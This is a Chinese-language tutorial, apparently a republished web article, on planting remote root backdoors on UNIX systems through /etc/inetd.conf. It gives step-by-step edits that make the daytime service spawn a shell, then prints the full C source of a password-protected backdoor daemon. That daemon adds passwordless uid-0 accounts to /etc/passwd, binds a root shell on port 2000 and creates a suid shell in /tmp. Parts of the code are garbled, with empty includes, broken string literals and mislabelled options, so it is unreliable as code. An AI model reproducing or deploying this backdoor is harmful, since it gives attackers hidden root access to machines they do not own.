超級(jí)服務(wù)器守護(hù)進(jìn)程（inetd）的配置文件。系統(tǒng)管理員一般情況下不經(jīng)常檢查該文件，因此這倒是個(gè)放置“后門”的好地方。:) 那么在這里如何建立一個(gè)最好的后門呢？當(dāng)然是遠(yuǎn)程的了。這樣你就不必需要本地帳號(hào)就可以成為根用戶了。首先，讓我們先來了解一下這方面的基礎(chǔ)知識(shí)：inetd 進(jìn)程負(fù)責(zé)監(jiān)聽各個(gè)TCP和UDP端口的連接請(qǐng)求，并根據(jù)連接請(qǐng)求啟動(dòng)相應(yīng)的服務(wù)器進(jìn)程。該配置文件 /etc/inetd.conf 很簡(jiǎn)單，基本形式如下：

(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
mountd/1 stream rpc/tcp wait root /usr/etc/mountd mountd

1：第一欄是服務(wù)名稱。服務(wù)名通過查詢 /etc/services 文件（供 TCP 和 UDP 服務(wù)使用）或 portmap 守護(hù)進(jìn)程（供 RPC 服務(wù)使用）映射成端口號(hào)。RPC（遠(yuǎn)程過程調(diào)用）服務(wù)由 name/num 的名字格式和第三欄中的 rpc 標(biāo)志識(shí)別。

2：第二欄決定服務(wù)使用的套接口類型：stream、dgram 或 raw。一般說來，stream 用于 TCP 服務(wù)，dgram 用于 UDP， raw 的使用很少見。

3：第三欄標(biāo)識(shí)服務(wù)使用的通信協(xié)議。允許的類型列在 protocols 文件中。協(xié)議幾乎總是是 tcp 或 udp。RPC 服務(wù)在協(xié)議類型前冠以 rpc/。

4：如果所說明的服務(wù)一次可處理多個(gè)請(qǐng)求（而不是處理一個(gè)請(qǐng)求后就退出），那么第四欄應(yīng)置成 wait，這樣可以阻止 inetd 持續(xù)地派生該守護(hù)進(jìn)程的新拷貝。此選項(xiàng)用于處理大量的小請(qǐng)求的服務(wù)。如果 wait 不合適，那么在本欄中填 nowait。

5：第五欄給出運(yùn)行守護(hù)進(jìn)程的用戶名。

6：第六欄給出守護(hù)進(jìn)程的全限定路徑名。

7：守護(hù)進(jìn)程的真實(shí)名字及其參數(shù)。

如果所要處理的工作微不足道（如不需要用戶交互），inetd 守護(hù)進(jìn)程便自己處理。此時(shí)第六、七欄只需填上 'internal' 即可。所以，要安裝一個(gè)便利的后門，可以選擇一個(gè)不常被使用的服務(wù)，用可以產(chǎn)生某種后門的守護(hù)進(jìn)程代替原先的守護(hù)進(jìn)程。例如，讓其添加 UID 0 的帳號(hào)，或復(fù)制一個(gè) suid shell。

一個(gè)比較好的方法之一，就是將用于提供日期時(shí)間的服務(wù) daytime 替換為能夠產(chǎn)生一個(gè) suid root 的 shell。只要將 /etc/inetd.conf 文件中的：

daytime stream tcp nowait root internal

修改為：

daytime stream tcp nowait /bin/sh sh -i.

然后重啟（記住：一定要重啟）inetd 進(jìn)程：

killall -9 inetd。

但更好、更隱蔽的方法是偽造網(wǎng)絡(luò)服務(wù)，讓它能夠在更難以察覺的情況下為我們提供后門，例如口令保護(hù)等。如果能夠在不通過 telnetd 連接的情況下輕松地進(jìn)行遠(yuǎn)程訪問，那是再好不過了。方法就是將“自己的”守護(hù)程序綁定到某個(gè)端口，該程序?qū)ν鈦磉B接不提供任何提示符，但只要直接輸入了正確的口令，就能夠順利地進(jìn)入系統(tǒng)。以下是這種后門的一個(gè)示范程序。（注：這個(gè)程序?qū)懙貌⒉缓芡暾?。?

<++> backdoor/remoteback.c
/* Coders:
Theft

Help from:
Sector9, Halogen

Greets: People: Liquid, AntiSocial, Peak, Grimknight, s0ttle,halogen,
Psionic, g0d, Psionic.
Groups: Ethical Mutiny Crew(EMC), Common Purpose hackers(CPH),
Global Hell(gH), Team Sploit, Hong Kong Danger Duo,
Tg0d, EHAP.
Usage:
Setup:
# gcc -o backhore backhore.c # ./backdoor password &
Run:
Telnet to the host on port 4000. After connected you
Will not be prompted for a password, this way it is less
Obvious, just type the password and press enter, after this
You will be prompted for a command, pick 1-8.

Distributers:
Ethical Mutiny Crew

*/

#include
#include
#include
#include
#include
#include
#include
#include

#define PORT 4000
#define MAXDATASIZE 100
#define BACKLOG 10
#define SA struct sockaddr

void handle(int);

int
main(int argc, char *argv[])
{
int sockfd, new_fd, sin_size, numbytes, cmd;
char ask[10]="Command: ";
char *bytes, *buf, pass[40];
struct sockaddr_in my_addr;

struct sockaddr_in their_addr;

printf("\n Backhore BETA by Theft\n");
printf(" 1: trojans rc.local\n");
printf(" 2: sends a systemwide message\n");
printf(" 3: binds a root shell on port 2000\n");
printf(" 4: creates suid sh in /tmp\n");
printf(" 5: creates mutiny account uid 0 no passwd\n");
printf(" 6: drops to suid shell\n");
printf(" 7: information on backhore\n");
printf(" 8: contact\n");

if (argc != 2) {
fprintf(stderr,"Usage: %s password\n", argv[0]);
exit(1);
}

strncpy(pass, argv[1], 40);
printf("..using password: %s..\n", pass);

if ( (sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket");
exit(1);
}

my_addr.sin_family = AF_INET;
my_addr.sin_port = htons(PORT);
my_addr.sin_addr.s_addr = INADDR_ANY;

if (bind(sockfd, (SA *)&my_addr, sizeof(SA)) == -1) {

perror("bind");
exit(1);
}

if (listen(sockfd, BACKLOG) == -1) {
perror("listen");
exit(1);
}

sin_size = sizeof(SA);
while(1) { /* main accept() loop */
if ((new_fd = accept(sockfd, (SA *)&their_addr, &sin_size)) == -1) {
perror("accept");
continue;
}
if (!fork()) {
dup2(new_fd, 0);
dup2(new_fd, 1);
dup2(new_fd, 2);
fgets(buf, 40, stdin);
if (!strcmp(buf, pass)) {
printf("%s", ask);
cmd = getchar();
handle(cmd);
}
close(new_fd);
exit(0);
}
close(new_fd);
while(waitpid(-1,NULL,WNOHANG) > 0); /* rape the dying children */
}
}

void
handle(int cmd)
{
FILE *fd;

switch(cmd) {
case '1':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("Trojaning rc.local\n");
fd = fopen("/etc/passwd", "a+");
fprintf(fd, "mutiny::0:0:ethical mutiny crew:/root:/bin/sh");
fclose(fd);
printf("Trojan complete.\n");
break;
case '2':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n<");
printf("Sending systemwide message..\n");
system("wall Box owned via the Ethical Mutiny Crew");
printf("Message sent.\n");
break;
case '3':
printf("\nBackhore BETA by Theft\n");
printf("="mailto:theft@cyberspace.org\n">theft@cyberspace.org\n");
printf("\nAdding inetd backdoor... (-p)\n");
fd = fopen("/etc/services","a+");
fprintf(fd,"backdoor\t2000/tcp\tbackdoor\n");
fd = fopen("/etc/inetd.conf","a+");
fprintf(fd,"backdoor\tstream\ttcp\tnowait\troot\t/bin/sh -i\n");
execl("killall", "-HUP", "inetd", NULL);
printf("\ndone.\n");
printf("telnet to port 2000\n\n");
break;
case '4':
printf("\nBackhore BETA by Theft\n");
printf("="mailto:theft@cyberspace.org\n">theft@cyberspace.org\n");
printf("\nAdding Suid Shell... (-s)\n");
system("cp /bin/sh /tmp/.sh");
system("chmod 4700 /tmp/.sh");
system("chown root:root /tmp/.sh");
printf("\nSuid shell added.\n");
printf("execute /tmp/.sh\n\n");
break;
case '5':
printf("\nBackhore BETA by Theft\n");
theft@cyberspace.org\n");
printf("\nAdding root account... (-u)\n");
fd=fopen("/etc/passwd","a+");
fprintf(fd,"hax0r::0:0::/:/bin/bash\n");
printf("\ndone.\n");
printf("uid 0 and gid 0 account added\n\n");
break;
case '6':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n<");
printf("Executing suid shell..\n");

execl("/bin/sh");
break;
case '7':
printf("\nBackhore BETA by Theft\n");
printf("theft@cyberspace.org\n");
printf("\nInfo... (-i)\n");
printf("\n3 - Adds entries to /etc/services & /etc/inetd.conf giving you\n");
printf("a root shell on port 2000. example: telnet 2000\n\n");
printf("4 - Creates a copy of /bin/sh to /tmp/.sh which, whenever\n");
printf("executed gives you a root shell. example:/tmp/.sh\n\n");
printf("5 - Adds an account with uid and gid 0 to the passwd file.\n");
printf("The login is 'mutiny' and there is no passwd.");
break;
case '8':
printf("\nBackhore BETA by Theft\n");
printf("\http://theft.bored.org\n");
printf(theft@cyberspace.org\n\n");
break;
default:
printf("unknown command: %d\n", cmd);
break;
}
}
<-->

【編輯推薦】

1. 創(chuàng)建UNIX后門(初級(jí)篇)
2. 創(chuàng)建UNIX后門(高級(jí)篇)